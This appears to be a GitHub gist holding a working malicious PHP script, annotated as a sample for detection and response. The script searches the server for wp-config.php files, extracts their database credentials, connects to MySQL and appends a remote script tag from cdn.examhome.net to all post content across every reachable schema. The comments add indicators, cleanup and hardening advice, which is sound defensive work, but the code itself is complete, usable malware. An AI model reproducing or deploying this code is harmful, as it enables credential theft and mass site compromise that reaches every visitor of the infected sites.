@geektutor
Created October 4, 2018 20:31
<?php echo ":#009009#:";
// ANALYSIS NOTE (malicious sample, annotated for detection and response).
// The line above prints the delimiter ":#009009#:". The same delimiter is
// echoed again after the search calls below, so everything this script prints
// is framed between two identical markers (presumably so the output can be cut
// out of the surrounding HTTP response; the consumer is not visible here).
// The marker literal and the "wp-config.php" target are usable as static
// indicators when scanning a web root for dropped copies of this file.
$file_to_search = "wp-config.php";
// Six searches: the first starts five directories above DOCUMENT_ROOT, each
// following call starts one level lower, and the last starts at DOCUMENT_ROOT
// itself. Nothing confines the walk to one site, so any matching file the PHP
// process can read under those roots is in scope. The leading @ suppresses the
// warnings raised while each call runs (e.g. unreadable directories), which
// keeps failures out of the output. Controls that limit this walk are
// open_basedir and running each site under its own OS user with
// non-world-readable configuration files.
@search_file($_SERVER['DOCUMENT_ROOT']."/../../../../..",$file_to_search);
@search_file($_SERVER['DOCUMENT_ROOT']."/../../../..",$file_to_search);
@search_file($_SERVER['DOCUMENT_ROOT']."/../../..",$file_to_search);
@search_file($_SERVER['DOCUMENT_ROOT']."/../..",$file_to_search);
@search_file($_SERVER['DOCUMENT_ROOT']."/..",$file_to_search);
@search_file($_SERVER['DOCUMENT_ROOT'],$file_to_search);
/**
 * Recursively walks $dir and hands every non-directory entry whose name
 * contains $file_to_search to show_sitenames().
 *
 * Points relevant to triage:
 * - The name test is a substring match (strpos), not an equality test, so
 *   leftover copies such as "wp-config.php.bak" are selected as well.
 * - Each entry is canonicalised with realpath() before the is_dir() test, so
 *   a symlink is treated as whatever it points to.
 * - No depth limit or visited-set is present in this function.
 * - The scandir() result is not checked; a failure there only produces a
 *   warning, which the @ on the top-level calls hides.
 *
 * @param string $dir            Directory to walk.
 * @param string $file_to_search Substring looked for in each file name.
 * @return void
 */
function search_file($dir,$file_to_search){
$files = scandir($dir);
foreach($files as $key => $value){
// Canonical absolute path of the entry (symlinks resolved).
$path = realpath($dir.DIRECTORY_SEPARATOR.$value);
if(!is_dir($path)) {
// Non-directory entry: select it when the name contains the search string.
if (strpos($value,$file_to_search) !== false) {
show_sitenames($path);
}
} else if($value != "." && $value != "..") {
// Directory other than the self/parent entries: descend into it.
search_file($path, $file_to_search);
}
}
}
// Closing delimiter: identical to the marker printed on the first line of the
// script, so the search output sits between two ":#009009#:" markers.
echo ":#009009#:";
/**
 * Payload stage of the sample: reads database credentials out of a located
 * configuration file and uses them to append a remote <script> tag to stored
 * post content.
 *
 * Observable behaviour, in order:
 * 1. Reads $file (errors suppressed) and continues only if it contains
 *    "DB_NAME".
 * 2. Extracts the DB_NAME, DB_HOST, DB_USER and DB_PASSWORD values with
 *    get_var_reg(). $db is assigned but not used again in this function.
 * 3. Opens a mysqli connection with those credentials; on failure the
 *    connection error text is echoed.
 * 4. Lists every table visible to that account whose name contains "post"
 *    (information_schema.TABLES, all schemas, not just the site's own).
 * 5. For each such table, samples one post_content value. If it lacks the
 *    string "examhome", echoes "nothing:<file>" and runs an UPDATE that
 *    appends a <script> tag loading from cdn.examhome.net to every row not
 *    already containing "examhome"; otherwise echoes "already exist:<file>".
 *
 * Response notes: removing the dropped PHP file does not undo step 5, so
 * cleanup has to include the database (search post_content for the injected
 * host). Credentials in every configuration file the PHP process could read
 * should be treated as exposed and rotated. A database account restricted to
 * its own schema narrows what step 4 can enumerate.
 *
 * @param string $file Path of the candidate configuration file.
 * @return void
 */
function show_sitenames($file){
$content = @file_get_contents($file);
// Cheap filter: only files that mention DB_NAME are parsed further.
if(strpos($content, "DB_NAME") !== false) {
// Each pattern captures the quoted value that follows the named constant and
// a comma, i.e. the second argument of a define()-style statement.
$db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content);
$host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content);
$user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content);
$pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content);
// Connect with the harvested credentials; no default schema is selected.
$conn = new mysqli($host, $user, $pass);
// On connection failure the error text is printed into the framed output.
if ($conn->connect_error) {
echo $conn->connect_error;
} else {
// Enumerate candidate tables by name across every schema this account can see.
$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
$result = $conn->query($q);
if ($result->num_rows > 0) {
while($row = $result->fetch_assoc()) {
// Sample a single row to decide whether this table was already modified.
// NOTE(review): tables matched by name that have no post_content column would
// make this query fail; the result is not checked before ->num_rows is read.
$q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." LIMIT 1 ";
$result2 = $conn->query($q2);
if ($result2->num_rows > 0) {
while($row2 = $result2->fetch_assoc()) {
$val = $row2['post_content'];
// "examhome" doubles as the infection marker and the detection indicator.
if(strpos($val, "examhome") === false){
echo "nothing:".$file."\n";
// Stored-content injection: appends the remote script tag to every row of the
// table that does not already contain the marker string.
$q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://cdn.examhome.net/cdn.js?ver=1.0.88' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%examhome%'";
$conn->query($q3);
} else {
echo "already exist:".$file."\n";
}
}
} else {
// Empty table (or no sample row): nothing is reported or changed.
}
}
} else {
// No table name matched: nothing is reported or changed.
}
$conn->close();
}
}
}
/**
 * Returns the first capture group of the first match of $pat in $text, or an
 * empty string when there is no match.
 *
 * The pattern is wrapped in "/" delimiters with the "i" (case-insensitive) and
 * "s" (dot matches newline) modifiers and is not escaped; the callers in this
 * file pass fixed literals only.
 *
 * @param string $pat  Pattern body, without delimiters.
 * @param string $text Text to search.
 * @return string Captured value, or "" if nothing matched.
 */
function get_var_reg($pat,$text) {
// $c holds the match count and is used only as the truth test here.
if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
{
return $matches[1][0];
}
return "";
}
// Ends execution here, so nothing that follows this code in the same request
// runs (presumably to keep the response limited to the framed output when the
// snippet is embedded in another file; the embedding is not visible here).
exit();